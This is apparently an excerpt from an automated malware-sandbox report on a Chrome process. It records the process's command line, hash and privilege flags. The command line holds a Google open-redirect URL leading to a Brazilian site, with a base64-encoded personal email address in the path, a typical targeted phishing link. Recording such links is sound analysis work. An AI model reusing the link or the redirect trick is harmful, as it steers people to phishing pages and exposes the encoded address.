                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.dz/url?q=nrnq5JLi6z3yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2falvoradavisual.com.br%2fyoya/cjbh/a2xhdXMubWFkZXJAc2JvLmNvLmF0 $$$ &c=E,1,acdMIvaoQStC4aiulDn5jPGsnimtLMV1JFn6BeW342oWxCIFHFvSiA0y2yY0Hz6ZJg_fxZUtnDRFz4Y_7GVcOkttSEslJfLPkj2AwC2wEfirVZI,&typo=1"
                                                Imagebase:0x7ff715980000
                                                File size:3'242'272 bytes
                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                No disassembly